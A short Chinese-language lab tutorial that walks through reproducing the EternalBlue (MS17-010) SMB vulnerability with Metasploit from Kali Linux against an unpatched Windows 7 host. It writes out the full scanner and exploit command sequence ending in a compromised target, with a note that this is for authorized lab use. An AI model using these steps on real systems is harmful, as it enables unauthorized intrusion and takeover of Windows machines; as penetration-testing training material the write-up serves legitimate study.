永恒之藍(EternalBlue)是利用 Windows 系統的 SMB 協議漏洞(MS17-010)來獲取系統最高權限的漏洞,利用 Metasploit 框架(MSF)復現該漏洞是一個復雜且具有一定風險的操作,必須在合法合規的環境下進行,如在經過授權的靶場環境,以下是具體復現步驟:
前期準備
- 攻擊機:安裝有 Metasploit 工具的 Kali Linux 系統,開啟并聯網,確保 Metasploit 能正常使用。
- 靶機:存在 MS17-010 漏洞的 Windows 系統,如未打補丁的 Windows 7、Windows Server 2008 R2 等,關閉防火墻和殺毒軟件(僅用于測試環境),并記錄其 IP 地址,假設為 192.168.244.139?。
- 網絡環境:攻擊機和靶機處于同一局域網,或可以相互通信.
?
利用 MSF 復現永恒之藍漏洞
在 Kali Linux 的終端中輸入
msfconsole
,回車啟動 Metasploit 框架。
搜索相關模塊:輸入
search ms17-010
,搜索與 MS17-010 漏洞相關的模塊。在搜索結果中,主要關注auxiliary/scanner/smb/smb_ms17_010
(掃描模塊)和exploit/windows/smb/ms17_010_eternalblue
(攻擊模塊) 。
掃描目標主機是否存在漏洞
使用掃描模塊:輸入
use auxiliary/scanner/smb/smb_ms17_010
,使用該掃描模塊。查看缺少的信息:輸入show options查看缺少的信息
設置目標主機:輸入
set rhosts 192.168.244.139
(將 IP 地址替換為靶機的實際 IP),設置要掃描的目標主機。運行掃描:輸入
run
,開始掃描目標主機是否存在 MS17-010 漏洞。如果目標主機存在漏洞,掃描結果會有相應提示。
調用攻擊模塊:輸入
use exploit/windows/smb/ms17_010_eternalblue
,調用永恒之藍的攻擊模塊。
配置攻擊模塊:輸入
show options
查看攻擊模塊的配置項,然后輸入set rhosts 192.168.244.139
設置目標機的 IP 地址。執行攻擊:輸入
run
運行攻擊模塊,若成功,會與 Windows 7 系統目標機建立連接。
?
這樣就入侵成功了,后續需要進行什么操作可自行選擇?
?